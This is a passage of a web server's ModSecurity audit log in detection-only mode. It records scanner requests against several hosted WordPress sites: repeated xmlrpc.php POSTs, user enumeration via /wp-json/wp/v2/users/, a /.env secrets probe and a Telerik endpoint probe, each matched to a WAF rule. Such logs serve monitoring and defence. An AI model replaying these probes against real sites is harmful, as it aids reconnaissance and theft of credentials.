"apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7clED4emz4pcZ5aGTadgAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749998740794695 929602 (- - -) Stopwatch2: 1749998740794695 929602; combined=1895, p1=353, p2=1115, p3=42, p4=60, p5=209, sr=100, sw=116, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f2812e2e-Z-- --82cdc159-A-- [15/Jun/2025:20:16:41.029814 +0530] aE7c0BLQPChAjmM6-0ipZwAAAAQ 128.199.112.101 55712 127.0.0.1 7081 --82cdc159-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --82cdc159-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --82cdc159-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7c0BLQPChAjmM6-0ipZwAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749998800108147 921744 (- - -) Stopwatch2: 1749998800108147 921744; combined=2422, p1=381, p2=1582, p3=47, p4=65, p5=223, sr=102, sw=124, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --82cdc159-Z-- --a38c2b11-A-- [15/Jun/2025:20:17:42.078931 +0530] aE7dDZK-05zbifgH_rT4TgAAAAU 128.199.112.101 59734 127.0.0.1 7081 --a38c2b11-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 489 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --a38c2b11-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --a38c2b11-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7dDZK-05zbifgH_rT4TgAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749998861152183 926803 (- - -) Stopwatch2: 1749998861152183 926803; combined=2045, p1=400, p2=1281, p3=41, p4=58, p5=163, sr=105, sw=102, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a38c2b11-Z-- --fc78b246-A-- [15/Jun/2025:20:18:42.673826 +0530] aE7dSfRzj1BwdxQoarvL0gAAAAo 128.199.112.101 40644 127.0.0.1 7081 --fc78b246-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --fc78b246-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --fc78b246-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7dSfRzj1BwdxQoarvL0gAAAAo"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749998921734171 939711 (- - -) Stopwatch2: 1749998921734171 939711; combined=2307, p1=367, p2=1508, p3=46, p4=73, p5=193, sr=107, sw=120, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --fc78b246-Z-- --10993c34-A-- [15/Jun/2025:20:19:43.063036 +0530] aE7dhlrAUUBu5GmXkdkUSgAAAAM 128.199.112.101 38286 127.0.0.1 7081 --10993c34-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 492 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --10993c34-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --10993c34-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7dhlrAUUBu5GmXkdkUSgAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749998982125842 937274 (- - -) Stopwatch2: 1749998982125842 937274; combined=2341, p1=372, p2=1389, p3=42, p4=61, p5=310, sr=114, sw=167, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --10993c34-Z-- --fbd2845c-A-- [15/Jun/2025:20:20:17.310089 +0530] aE7dqfRzj1BwdxQoarvL-wAAAAo 172.69.94.107 53632 127.0.0.1 7081 --fbd2845c-B-- GET //wp-json/wp/v2/users/ HTTP/1.0 Host: www.getcalley.com X-Real-IP: 172.69.94.107 X-Forwarded-For: 13.201.31.180 Connection: close cf-ray: 9502e0feb9ba423c-BOM cdn-loop: cloudflare; loops=1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 accept-encoding: gzip, br x-forwarded-proto: https cf-ipcountry: IN cf-connecting-ip: 13.201.31.180 cf-visitor: {"scheme":"https"} --fbd2845c-F-- HTTP/1.1 401 Unauthorized X-Powered-By: PHP/8.2.28 X-Robots-Tag: noindex Link: <https://www.getcalley.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type Vary: Origin,Accept-Encoding Content-Encoding: gzip Content-Length: 124 Connection: close Content-Type: application/json; charset=UTF-8 --fbd2845c-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.getcalley.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.getcalley.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.getcalley.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE7dqfRzj1BwdxQoarvL-wAAAAo"] Apache-Handler: proxy:unix:/var/www/vhosts/system/getcalley.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749999017019123 291077 (- - -) Stopwatch2: 1749999017019123 291077; combined=2285, p1=345, p2=1822, p3=0, p4=0, p5=118, sr=108, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --fbd2845c-Z-- --afa6b562-A-- [15/Jun/2025:20:20:43.895363 +0530] aE7dwlrAUUBu5GmXkdkUZAAAAAM 128.199.112.101 35618 127.0.0.1 7081 --afa6b562-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --afa6b562-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --afa6b562-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7dwlrAUUBu5GmXkdkUZAAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749999042945554 949876 (- - -) Stopwatch2: 1749999042945554 949876; combined=2047, p1=371, p2=1279, p3=44, p4=61, p5=182, sr=107, sw=110, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --afa6b562-Z-- --3fd2e55c-A-- [15/Jun/2025:20:20:48.461683 +0530] aE7dxxLQPChAjmM6-0ip0QAAAAQ 207.180.240.208 35760 127.0.0.1 7081 --3fd2e55c-B-- GET /.env HTTP/1.0 Host: www.csquaretech.com X-Real-IP: 207.180.240.208 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept-Encoding: gzip, deflate Accept: */* --3fd2e55c-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.2.28 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.csquaretech.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --3fd2e55c-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.csquaretech.com"] [uri "/.env"] [unique_id "aE7dxxLQPChAjmM6-0ip0QAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/csquaretech.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749999047381276 1080489 (- - -) Stopwatch2: 1749999047381276 1080489; combined=1854, p1=411, p2=1341, p3=0, p4=0, p5=102, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3fd2e55c-Z-- --f6ec1f70-A-- [15/Jun/2025:20:21:43.694490 +0530] aE7d_lu1-lKBbvo2E9pVIgAAAAw 128.199.112.101 40402 127.0.0.1 7081 --f6ec1f70-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 492 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --f6ec1f70-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --f6ec1f70-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7d_lu1-lKBbvo2E9pVIgAAAAw"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749999102765194 929352 (- - -) Stopwatch2: 1749999102765194 929352; combined=2225, p1=378, p2=1502, p3=40, p4=55, p5=160, sr=108, sw=90, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f6ec1f70-Z-- --5f5ad76f-A-- [15/Jun/2025:20:22:43.258914 +0530] aE7eOpK-05zbifgH_rT4zgAAAAU 128.199.112.101 50302 127.0.0.1 7081 --5f5ad76f-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 495 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --5f5ad76f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --5f5ad76f-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7eOpK-05zbifgH_rT4zgAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749999162330365 928606 (- - -) Stopwatch2: 1749999162330365 928606; combined=2122, p1=376, p2=1320, p3=42, p4=65, p5=205, sr=107, sw=114, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5f5ad76f-Z-- --7b47b934-A-- [15/Jun/2025:20:23:43.550249 +0530] aE7edpK-05zbifgH_rT47AAAAAU 128.199.112.101 51254 127.0.0.1 7081 --7b47b934-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 492 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --7b47b934-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --7b47b934-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7edpK-05zbifgH_rT47AAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749999222622293 928027 (- - -) Stopwatch2: 1749999222622293 928027; combined=2719, p1=367, p2=1943, p3=46, p4=68, p5=181, sr=110, sw=114, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7b47b934-Z-- --5b6b9d1a-A-- [15/Jun/2025:20:23:56.988639 +0530] aE7ehBLQPChAjmM6-0iqHQAAAAQ 208.88.73.86 57752 127.0.0.1 7081 --5b6b9d1a-B-- GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.0 Host: padah.cstechns.com X-Real-IP: 208.88.73.86 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="96", "Google Chrome";v="96" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Accept-Encoding: gzip, br, deflate --5b6b9d1a-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 04:35:16 GMT ETag: "328-62143b366eaa6" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --5b6b9d1a-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||padah.cstechns.com|F|2"] [data ".web.ui.webresource.axd"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||padah.cstechns.com|F|2"] [data ".web.ui.webresource.axd"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "padah.cstechns.com"] [uri "/Telerik.Web.UI.WebResource.axd"] [unique_id "aE7ehBLQPChAjmM6-0iqHQAAAAQ"] Stopwatch: 1749999236984997 3700 (- - -) Stopwatch2: 1749999236984997 3700; combined=2388, p1=327, p2=2000, p3=0, p4=0, p5=61, sr=97, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5b6b9d1a-Z-- --b99ac74a-A-- [15/Jun/2025:20:24:13.444469 +0530] aE7elVu1-lKBbvo2E9pVYQAAAAw 82.102.18.180 51354 127.0.0.1 7081 --b99ac74a-B-- GET //wp-json/wp/v2/users/ HTTP/1.0 Host: www.rsda.in X-Real-IP: 82.102.18.180 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 --b99ac74a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 X-Robots-Tag: noindex Link: <https://www.rsda.in/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type X-WP-Total: 1 X-WP-TotalPages: 1 Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --b99ac74a-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.rsda.in"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE7elVu1-lKBbvo2E9pVYQAAAAw"] Apache-Handler: proxy:unix:/var/www/vhosts/system/rsda.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749999253129100 315444 (- - -) Stopwatch2: 1749999253129100 315444; combined=1679, p1=336, p2=1217, p3=0, p4=0, p5=125, sr=89, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b99ac74a-Z-- --c43cce60-A-- [15/Jun/2025:20:24:15.886803 +0530] aE7elwG_OhOIIVz6TXRzWgAAAAA 82.102.18.180 51462 127.0.0.1 7081 --c43cce60-B-- POST //xmlrpc.php HTTP/1.0 Host: www.rsda.in X-Real-IP: 82.102.18.180 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 486 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --c43cce60-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --c43cce60-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 82.102.18.180 (+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 82.102.18.180 (+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "www.rsda.in"] [uri "/xmlrpc.php"] [unique_id "aE7elwG_OhOIIVz6TXRzWgAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/rsda.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749999255605192 281667 (- - -) Stopwatch2: 1749999255605192 281667; combined=2185, p1=366, p2=1464, p3=47, p4=53, p5=161, sr=98, sw=94, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c43cce60-Z-- --f0f72d69-A-- [15/Jun/2025:20:24:43.581526 +0530] aE7eskD4emz4pcZ5aGTbbAAAAAE 128.199.112.101 34186 127.0.0.1 7081 --f0f72d69-B-- POST 